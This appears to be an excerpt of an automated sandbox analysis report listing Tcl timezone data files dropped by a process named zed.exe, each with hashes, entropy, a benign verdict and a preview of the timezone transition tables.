                                                                                                                                                                                                                                            MD5:390F39934F095F89358B73D056D90264
                                                                                                                                                                                                                                            SHA1:6B57CE5346B50ED88BFBB6BC57F834FB3F564905
                                                                                                                                                                                                                                            SHA-256:6E0278E389072437BC07A5032CD58E9E5B1B2BDB20918632C422EFA97BC43ABF
                                                                                                                                                                                                                                            SHA-512:6C54D94E95D73030F2FFCF8D130494CBD79FB1CEB9B59ADE0743C10F02557C3DD59CC6274B262A7E29C2D4C35DDA4B6A9A0398C661F5BD40F3B92181192B9577
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Kamchatka) {.. {-9223372036854775808 38076 0 LMT}.. {-1487759676 39600 0 +11}.. {-1247569200 43200 0 +13}.. {354888000 46800 1 +13}.. {370695600 43200 0 +12}.. {386424000 46800 1 +13}.. {402231600 43200 0 +12}.. {417960000 46800 1 +13}.. {433767600 43200 0 +12}.. {449582400 46800 1 +13}.. {465314400 43200 0 +12}.. {481039200 46800 1 +13}.. {496764000 43200 0 +12}.. {512488800 46800 1 +13}.. {528213600 43200 0 +12}.. {543938400 46800 1 +13}.. {559663200 43200 0 +12}.. {575388000 46800 1 +13}.. {591112800 43200 0 +12}.. {606837600 46800 1 +13}.. {622562400 43200 0 +12}.. {638287200 46800 1 +13}.. {654616800 43200 0 +12}.. {670341600 39600 0 +12}.. {670345200 43200 1 +12}.. {686070000 39600 0 +11}.. {695746800 43200 0 +13}.. {701791200 46800 1 +13}.. {717516000 43200 0 +12}.. {733240800 46800 1 +13}.. {748965600 43200 0 +12}.. {764
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):457
                                                                                                                                                                                                                                            Entropy (8bit):4.396286144160272
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:MB862dmdH35Cy6DvjeQXvjKEn6vNEhFc0bkTfb2iWToN1:5de3IjjeQ/jKE6vNNa8
                                                                                                                                                                                                                                            MD5:DF604BCD42A3C1E6BABD0E4FF5764CA3
                                                                                                                                                                                                                                            SHA1:984111F3A75EE7D8760AA2B839010545AF8EE359
                                                                                                                                                                                                                                            SHA-256:4E7F7ACAE8B4018A835328744F680C8054771805BB0BB07678A09737963C090D
                                                                                                                                                                                                                                            SHA-512:690AC3FC7CA3C66AA70F17E38C6B43FFACAB3F86040C3BA94FBFF80AC8C1AECF8192E503282109DABF3228F8DC73C732F1041C80455B8B26BDB25C4C32FA286A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Karachi) {.. {-9223372036854775808 16092 0 LMT}.. {-1988166492 19800 0 +0530}.. {-862637400 23400 1 +0630}.. {-764145000 19800 0 +0530}.. {-576135000 18000 0 +05}.. {38775600 18000 0 PKT}.. {1018119600 21600 1 PKST}.. {1033840800 18000 0 PKT}.. {1212260400 21600 1 PKST}.. {1225476000 18000 0 PKT}.. {1239735600 21600 1 PKST}.. {1257012000 18000 0 PKT}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):174
                                                                                                                                                                                                                                            Entropy (8bit):4.967143524972358
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8s4YkyXHAIgNrYOARL/2WFKu3e2WFKjov:SlSWB9vsM3yMGSHAIgvAN/2wKulwKjy
                                                                                                                                                                                                                                            MD5:259662F35AA09A891C2DDF8FCFECD6F0
                                                                                                                                                                                                                                            SHA1:DBB3A363A34C33F0B6B0D677E43C2985E2BAF976
                                                                                                                                                                                                                                            SHA-256:7B2251F0A41CBADF45D69F24604834167B14D8D33B510E635719AB404CABBCE2
                                                                                                                                                                                                                                            SHA-512:CD7E514555D58985C774535556B66542EFC5FB7CD5891F42FE21B591612CB7EBD4B41E96593E26E9283BA1B01EF3BE0FDFAE871F5EF6ADF2286AF1E479DCB44B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Urumqi)]} {.. LoadTimeZoneFile Asia/Urumqi..}..set TZData(:Asia/Kashgar) $TZData(:Asia/Urumqi)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):185
                                                                                                                                                                                                                                            Entropy (8bit):4.896398105471451
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/2WFKXIi7hvXMXGm2OHF+VT5oHsQKwMTXvv6Q6zRk8P4VvW/:SlSWB9eg/2wKYghfDm2OH0T5oHxNMzv8
                                                                                                                                                                                                                                            MD5:7AC6429D2A08372C71C61B4521246FEC
                                                                                                                                                                                                                                            SHA1:6E50F5AD1018398491453D751F8B717B618EF46E
                                                                                                                                                                                                                                            SHA-256:F0A0816E62036637F75081CBF17A1E6B8FBC2D86AEC3CD2E234BBBDD6EC9F109
                                                                                                                                                                                                                                            SHA-512:A5389A318896ABCAFE419262F6B8CA86C917788F1E2AFBC8CB1C074A52870E7A92C9F6F7D79DDE4AB0D267D870D3CCD69B3FC5FD57520352EFE36C583B493FB9
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Kathmandu) {.. {-9223372036854775808 20476 0 LMT}.. {-1577943676 19800 0 +0530}.. {504901800 20700 0 +0545}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):184
                                                                                                                                                                                                                                            Entropy (8bit):4.8363583658476745
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8yIi7V5XHAIgN1AIilvWARL/2WFKSiZ1/2WFKXIi7y:SlSWB9vsM3y7gVJHAIg5QOAN/2wKSg15
                                                                                                                                                                                                                                            MD5:4CCC96293A33113D9ADC4130DCD19CBA
                                                                                                                                                                                                                                            SHA1:7BAB4B8DD6BB415A2FC86D9AB36BE2A893C03153
                                                                                                                                                                                                                                            SHA-256:9ACC9586B6F8B53BFE8B242283A434A9A9633D60559EBFDEE263B4C8915D50CA
                                                                                                                                                                                                                                            SHA-512:644E1777E01C15A728E30526F131462FCE50476A8FEDA9B99F41D95013BB8833A79437E75AA2025E2FD2E253B9AD40709DEF77E1F0C73DAAE7A9CF886A175A03
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Kathmandu)]} {.. LoadTimeZoneFile Asia/Kathmandu..}..set TZData(:Asia/Katmandu) $TZData(:Asia/Kathmandu)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2119
                                                                                                                                                                                                                                            Entropy (8bit):3.707911838150672
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5No6r1gIgWH/lt0irzEzCSCItWiIrW+rDQk9CVhyFYkRDhUBAc6l:r5PhtjLiII2JBC6c6l
                                                                                                                                                                                                                                            MD5:D7B394A9662D60D01781005FE73CC9E8
                                                                                                                                                                                                                                            SHA1:50B5EBD02596DC45D1F69358C5B69DD3058905FC
                                                                                                                                                                                                                                            SHA-256:33203D7FB7F3D1F848640ECE0642A2305E1863B4D47413075E2E7E40BD7418E7
                                                                                                                                                                                                                                            SHA-512:055EBA420F2F6049E803796ACCA263264B9E585E5312A86B8DF7B409C5F1CB1810F3AEDACD66CCF4605E55198947D263C240486C2A4D453D23C89802F0C66BBA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Khandyga) {.. {-9223372036854775808 32533 0 LMT}.. {-1579424533 28800 0 +08}.. {-1247558400 32400 0 +10}.. {354898800 36000 1 +10}.. {370706400 32400 0 +09}.. {386434800 36000 1 +10}.. {402242400 32400 0 +09}.. {417970800 36000 1 +10}.. {433778400 32400 0 +09}.. {449593200 36000 1 +10}.. {465325200 32400 0 +09}.. {481050000 36000 1 +10}.. {496774800 32400 0 +09}.. {512499600 36000 1 +10}.. {528224400 32400 0 +09}.. {543949200 36000 1 +10}.. {559674000 32400 0 +09}.. {575398800 36000 1 +10}.. {591123600 32400 0 +09}.. {606848400 36000 1 +10}.. {622573200 32400 0 +09}.. {638298000 36000 1 +10}.. {654627600 32400 0 +09}.. {670352400 28800 0 +09}.. {670356000 32400 1 +09}.. {686080800 28800 0 +08}.. {695757600 32400 0 +10}.. {701802000 36000 1 +10}.. {717526800 32400 0 +09}.. {733251600 36000 1 +10}.. {748976400 32400 0 +09}.. {7647
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):336
                                                                                                                                                                                                                                            Entropy (8bit):4.614218930153471
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/2wKvhfDm2OHEX3gYoHrXdUvvYbQLpUFdvjSVVFJLNsR/QFckVVFJLLW:MB8623tmdHNYCDWXYbQtUTvjAJBs50vs
                                                                                                                                                                                                                                            MD5:248F1B5A26455000C936CE8BC02C1A0B
                                                                                                                                                                                                                                            SHA1:0C3F8CD4E038B113E5238AC52652809B6CA27999
                                                                                                                                                                                                                                            SHA-256:6D464564ED2EFC9DADA1586D4FC99FE333726D2BE15A00E30C2391F588896463
                                                                                                                                                                                                                                            SHA-512:AF36B0B3D410305ED504726C87265ACCAF5577A9B5DD7E7DAF135420E356C651287873197431B65B5317B4BA2009274288E4F101AC1274045A8D99E2414AB132
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Kolkata) {.. {-9223372036854775808 21208 0 LMT}.. {-3645237208 21200 0 HMT}.. {-3155694800 19270 0 MMT}.. {-2019705670 19800 0 IST}.. {-891581400 23400 1 +0630}.. {-872058600 19800 0 IST}.. {-862637400 23400 1 +0630}.. {-764145000 19800 0 IST}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2062
                                                                                                                                                                                                                                            Entropy (8bit):3.7086418466382605
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5Ote2CoXJfsFN/3sFrOksF/sF7IyksF7FRZsFLsFTsFcsFk73sFK/XCFKTipnFEw:5B40yVRB7VfXucydm46I/CTxwh
                                                                                                                                                                                                                                            MD5:A59F7FFD0C3EBAD47EC5F2B89EBBD9FA
                                                                                                                                                                                                                                            SHA1:ACB94E28E0CF7C6606086267CEA1F63A3E755F56
                                                                                                                                                                                                                                            SHA-256:53B8D5E7FB1BD67FECE66A933D9BDBB773F14A8C04D316A2A1B00EC6DBC151DD
                                                                                                                                                                                                                                            SHA-512:7B3886B9D0A793CCEEDB2B190523922CFEBE5C82A5201C9EFA30CA4C7F63FB75C998CC7E1BD48D5D489F16E36FC0C22BD954CB7D321B3C09B36B60629C4C9F7E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Krasnoyarsk) {.. {-9223372036854775808 22286 0 LMT}.. {-1577513486 21600 0 +06}.. {-1247551200 25200 0 +08}.. {354906000 28800 1 +08}.. {370713600 25200 0 +07}.. {386442000 28800 1 +08}.. {402249600 25200 0 +07}.. {417978000 28800 1 +08}.. {433785600 25200 0 +07}.. {449600400 28800 1 +08}.. {465332400 25200 0 +07}.. {481057200 28800 1 +08}.. {496782000 25200 0 +07}.. {512506800 28800 1 +08}.. {528231600 25200 0 +07}.. {543956400 28800 1 +08}.. {559681200 25200 0 +07}.. {575406000 28800 1 +08}.. {591130800 25200 0 +07}.. {606855600 28800 1 +08}.. {622580400 25200 0 +07}.. {638305200 28800 1 +08}.. {654634800 25200 0 +07}.. {670359600 21600 0 +07}.. {670363200 25200 1 +07}.. {686088000 21600 0 +06}.. {695764800 25200 0 +08}.. {701809200 28800 1 +08}.. {717534000 25200 0 +07}.. {733258800 28800 1 +08}.. {748983600 25200 0 +07}.. {7
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):188
                                                                                                                                                                                                                                            Entropy (8bit):4.956557779400841
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq801c3vXHAIgNtK1tyHRL/2WFK1NFWFKf1z:SlSWB9vsM3yUgHAIgWv6N/2wK1NFwKf9
                                                                                                                                                                                                                                            MD5:E70767DA85A7E1FA9395FF0B16CFE5CE
                                                                                                                                                                                                                                            SHA1:3F78034F166CFC80B54E56AF289C7700A7E4AA5C
                                                                                                                                                                                                                                            SHA-256:056D352DDCFEC155375430FFF3C8743ED5C9B51B866A099E97E12CC381071F50
                                                                                                                                                                                                                                            SHA-512:FEDC854FB043AA79F132827F98F8983E480727FAA039CF2FB5B82611E724312A4F3F006EE58707F12B0AA90F5872E17F76E2A040CFB3A90D017C5CF92E52DA0A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Singapore)]} {.. LoadTimeZoneFile Asia/Singapore..}..set TZData(:Asia/Kuala_Lumpur) $TZData(:Asia/Singapore)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):669
                                                                                                                                                                                                                                            Entropy (8bit):4.074079100812583
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/2wKPLBDm2OHXoH3UTdMVSSFVM5qGeCiKaFzsBRcerUNwGvULhMXeiCs:MB862HL1mdHXC3UBMxJJo9rphTXUzHHF
                                                                                                                                                                                                                                            MD5:489E706324960E86B6E174D913C72E02
                                                                                                                                                                                                                                            SHA1:C7D77482C0D41F3426FC269B3B6C0575EF0E8C7E
                                                                                                                                                                                                                                            SHA-256:6E35E560675B0B5322474900D4EC8326C504788C1F82E533B09785DEEFF092DF
                                                                                                                                                                                                                                            SHA-512:5CEFD44656C041E59A16481E042EA914E7C003BDE6ADF5F49B57052E91F4F732A91A244BD8BC09EF5DC2640D3210DEE53882717C5C4CBD85CCE44A93B028E9C3
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Kuching) {.. {-9223372036854775808 26480 0 LMT}.. {-1383463280 27000 0 +0730}.. {-1167636600 28800 0 +08}.. {-1082448000 30000 1 +08}.. {-1074586800 28800 0 +08}.. {-1050825600 30000 1 +08}.. {-1042964400 28800 0 +08}.. {-1019289600 30000 1 +08}.. {-1011428400 28800 0 +08}.. {-987753600 30000 1 +08}.. {-979892400 28800 0 +08}.. {-956217600 30000 1 +08}.. {-948356400 28800 0 +08}.. {-924595200 30000 1 +08}.. {-916734000 28800 0 +08}.. {-893059200 30000 1 +08}.. {-885198000 28800 0 +08}.. {-879667200 32400 0 +09}.. {-767005200 28800 0 +08}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):173
                                                                                                                                                                                                                                            Entropy (8bit):4.877362838821003
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8t14XHAIgNsM13oOARL/2WFKdQWFK81Fn:SlSWB9vsM3yN14HAIgaM1YOAN/2wKdQ6
                                                                                                                                                                                                                                            MD5:EA1DB4B80CC74CBA024B9BF3734B31F2
                                                                                                                                                                                                                                            SHA1:D8131C093BCA3B378BEC606CFEB56A40CB4E246F
                                                                                                                                                                                                                                            SHA-256:8E0C60A9AA64FB8602EDC35311F7436B04853970A21C1F6C871494A09AAD5787
                                                                                                                                                                                                                                            SHA-512:3B57C9CCC16AA4FE71D275D5EC6A7BC1838841023EE4408158362A7E13E7F1B345F7D95006BC8D2FC270158864E286A1A9364C792F679D5803BD82148399C199
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Riyadh)]} {.. LoadTimeZoneFile Asia/Riyadh..}..set TZData(:Asia/Kuwait) $TZData(:Asia/Riyadh)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):169
                                                                                                                                                                                                                                            Entropy (8bit):4.781739054385376
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8PWXHAIgNz+NOARL/2WFKf+WFKkvn:SlSWB9vsM3yOHAIg1AN/2wKGwKmn
                                                                                                                                                                                                                                            MD5:55DAE27AEAA74FE822338C20B6CDFF68
                                                                                                                                                                                                                                            SHA1:F00EB827DC29EB2063B3A0EDBC39856637C55F33
                                                                                                                                                                                                                                            SHA-256:4308D741C83B263C7C9FB8EC692A7B7B502135E407B265B12EA7EF92523455C0
                                                                                                                                                                                                                                            SHA-512:398EE6015C58BDBBEAB49B74833B938FD84DE1AC6D3B8D095CE772ECA980D9E93F4EBFFFFCEAE7F91E287C8CE4F94B1A078D8E1460C352B7C2018F99915838FF
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Macau)]} {.. LoadTimeZoneFile Asia/Macau..}..set TZData(:Asia/Macao) $TZData(:Asia/Macau)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2217
                                                                                                                                                                                                                                            Entropy (8bit):3.9638741177777868
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5ReCX8Iv3nhPHCvzncCHg9PHjZzH+0HDHN1aHhHNaezHBjHeHsH65H18HDH983lY:5d8u3hfCTcaOrh6qn151Wf3Bogp+nlC
                                                                                                                                                                                                                                            MD5:B184E7403CB7168607D2C9E158F86A3B
                                                                                                                                                                                                                                            SHA1:48B003B8F822BE979FBCB08CBDBFFC617BCF99DB
                                                                                                                                                                                                                                            SHA-256:FBCB92CECB1CB0BC284ADC30D70C5F57B3AFC992136A0D898ABC64490BB700FB
                                                                                                                                                                                                                                            SHA-512:D8C5C67CAEB7C670B7BD1DACC1203C4DEE4DDB16A780F502C4440997CFCFF869E86842EF87C2CD0E0B942941C02A6BC3BDAB7CEAD78B026B68F4A031173400C8
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Macau) {.. {-9223372036854775808 27250 0 LMT}.. {-2056692850 28800 0 CST}.. {-884509200 32400 0 +09}.. {-873280800 36000 1 +09}.. {-855918000 32400 0 +09}.. {-841744800 36000 1 +09}.. {-828529200 32400 0 +10}.. {-765363600 28800 0 CT}.. {-747046800 32400 1 CDT}.. {-733827600 28800 0 CST}.. {-716461200 32400 1 CDT}.. {-697021200 28800 0 CST}.. {-683715600 32400 1 CDT}.. {-667990800 28800 0 CST}.. {-654771600 32400 1 CDT}.. {-636627600 28800 0 CST}.. {-623322000 32400 1 CDT}.. {-605178000 28800 0 CST}.. {-591872400 32400 1 CDT}.. {-573642000 28800 0 CST}.. {-559818000 32400 1 CDT}.. {-541674000 28800 0 CST}.. {-528368400 32400 1 CDT}.. {-510224400 28800 0 CST}.. {-498128400 32400 1 CDT}.. {-478774800 28800 0 CST}.. {-466678800 32400 1 CDT}.. {-446720400 28800 0 CST}.. {-435229200 32400 1 CDT}.. {-415258200 28800 0 CST}.. {-403158600
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2088
                                                                                                                                                                                                                                            Entropy (8bit):3.7643610103361134
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5he9dbbv+OC+jsuwltZQONEa2Ggf3augO8UoxLyHdX/CX6bW4Bv/7NKx/y:5wv+0j6lua2Gg/3gO8UoOZU2Wc/pKo
                                                                                                                                                                                                                                            MD5:F62A89F441C9C17EB99F64223C815651
                                                                                                                                                                                                                                            SHA1:408C38A79E056FF9B03D0DA85114DC015CB66938
                                                                                                                                                                                                                                            SHA-256:0C6EEEB7975A95C2B0678D137E6A735238D244A37FA11078050051511DE499FE
                                                                                                                                                                                                                                            SHA-512:55DC72546BDC26450D5318E9D2819E32A91C27D06A7AF5432BD50F8722C69984BBAA8599055A824D2935D919F0C0AA357687DD9B47F49F213EEE21AF7458FE17
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Magadan) {.. {-9223372036854775808 36192 0 LMT}.. {-1441188192 36000 0 +10}.. {-1247565600 39600 0 +12}.. {354891600 43200 1 +12}.. {370699200 39600 0 +11}.. {386427600 43200 1 +12}.. {402235200 39600 0 +11}.. {417963600 43200 1 +12}.. {433771200 39600 0 +11}.. {449586000 43200 1 +12}.. {465318000 39600 0 +11}.. {481042800 43200 1 +12}.. {496767600 39600 0 +11}.. {512492400 43200 1 +12}.. {528217200 39600 0 +11}.. {543942000 43200 1 +12}.. {559666800 39600 0 +11}.. {575391600 43200 1 +12}.. {591116400 39600 0 +11}.. {606841200 43200 1 +12}.. {622566000 39600 0 +11}.. {638290800 43200 1 +12}.. {654620400 39600 0 +11}.. {670345200 36000 0 +11}.. {670348800 39600 1 +11}.. {686073600 36000 0 +10}.. {695750400 39600 0 +12}.. {701794800 43200 1 +12}.. {717519600 39600 0 +11}.. {733244400 43200 1 +12}.. {748969200 39600 0 +11}.. {76469
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):243
                                                                                                                                                                                                                                            Entropy (8bit):4.737440985553183
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/2wK5XDm2OHUVoHxYQTLQTvj1kc3gEpHkH8vScHr0:MB862hTmdHsCLTI6cQe7HHA
                                                                                                                                                                                                                                            MD5:9116C0B70AB33EC49F933EAE0238FD4B
                                                                                                                                                                                                                                            SHA1:BA390E8FBEAF5EA6E861AFC5A51CD4DF0B422461
                                                                                                                                                                                                                                            SHA-256:30D8AB00E32ECE51442C0310E650D89D6989E0809600EE334CB10C506D84BF9D
                                                                                                                                                                                                                                            SHA-512:499E60E8CBDA72226BCB4E241020E62B6F88E7D3E4329D260A6536EF87C02D7D61FD1BECC47D4FF308B4EB5D3E7FFBE2EC1C96FE2DEDC09DD1D973421C5FFE1E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Makassar) {.. {-9223372036854775808 28656 0 LMT}.. {-1577951856 28656 0 MMT}.. {-1172908656 28800 0 +08}.. {-880272000 32400 0 +09}.. {-766054800 28800 0 WITA}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):421
                                                                                                                                                                                                                                            Entropy (8bit):4.48495488773916
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:MB862GjmdHnCTZBCvEo6AwoucQzy4orjAbomAtoNv:5GjeCVwvB6AduXzylHAMmAa9
                                                                                                                                                                                                                                            MD5:0FBF0ED252638DF31826C33EB3FFBFE2
                                                                                                                                                                                                                                            SHA1:3496E4A5251A9BDF3AA4368297140780B6DBF66D
                                                                                                                                                                                                                                            SHA-256:070D61A0E39643A700ABA89A8A4BE5733BA456958966098405E11ECDFA854D76
                                                                                                                                                                                                                                            SHA-512:2A40E14964B357809E596DF88D8C4141ED78664BACA0A7724A7CA837EF427DC2B07C48D9DBE5787FAB0015673F5BDE002223D489334C5B91B74EEC5507A14B78
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Manila) {.. {-9223372036854775808 -57360 0 LMT}.. {-3944621040 29040 0 LMT}.. {-2229321840 28800 0 PST}.. {-1046678400 32400 1 PDT}.. {-1038733200 28800 0 PST}.. {-873273600 32400 0 JST}.. {-794221200 28800 0 PST}.. {-496224000 32400 1 PDT}.. {-489315600 28800 0 PST}.. {259344000 32400 1 PDT}.. {275151600 28800 0 PST}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):170
                                                                                                                                                                                                                                            Entropy (8bit):4.805992552335358
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8DeXHAIgN6S7ARL/2WFKvE+H+WFKQ3n:SlSWB9vsM3yj+HAIgMS7AN/2wKLewKQ3
                                                                                                                                                                                                                                            MD5:8AEB5C3E81069F884A370714E8013F1F
                                                                                                                                                                                                                                            SHA1:4E3DD4A84627E75E84726C0CBA72CA6801280C2B
                                                                                                                                                                                                                                            SHA-256:011B7DE1C9F7EC241B224BC864D8AE66ACB433FBC8AD939E4DBEB12BE6390243
                                                                                                                                                                                                                                            SHA-512:50B1DE2615AE9B4781505DC709F9D07F6221D4E6D7B61D7BDA682377EAD9807F47FF0E933B79823D0DFD9F3647A82CFC28FB41FBB2226ED1D08B76F86FEB45DC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Dubai)]} {.. LoadTimeZoneFile Asia/Dubai..}..set TZData(:Asia/Muscat) $TZData(:Asia/Dubai)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7625
                                                                                                                                                                                                                                            Entropy (8bit):3.7113086720696398
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:R3pv/7V6Aj8aZaNlKkUpvBeRF+iDlKSdkwSMTHkB2vwz59F06Kgr/y/rYjlBKb0l:R3v/AauivBeRF+W35Syrwl9h5j
                                                                                                                                                                                                                                            MD5:2ADD0DFC1F133E4D044727234251A3DC
                                                                                                                                                                                                                                            SHA1:0D1502986258349E384017BA6CB8FA0AC424638C
                                                                                                                                                                                                                                            SHA-256:3C3E4844C70D361893EF022D6C3C8E38B243E91D40C5A726C924355476816F25
                                                                                                                                                                                                                                            SHA-512:70CDD53E7E44EDABF653A4F92EECBF5BB20A31DA95D65209D1CADE7DD9FC68946B8EC8829C28AE00BE5F42AAB545B9282CBBCFC5834437D6A94A179BF4FE0141
                                                                                                                                                                                                                                            Malicious:false
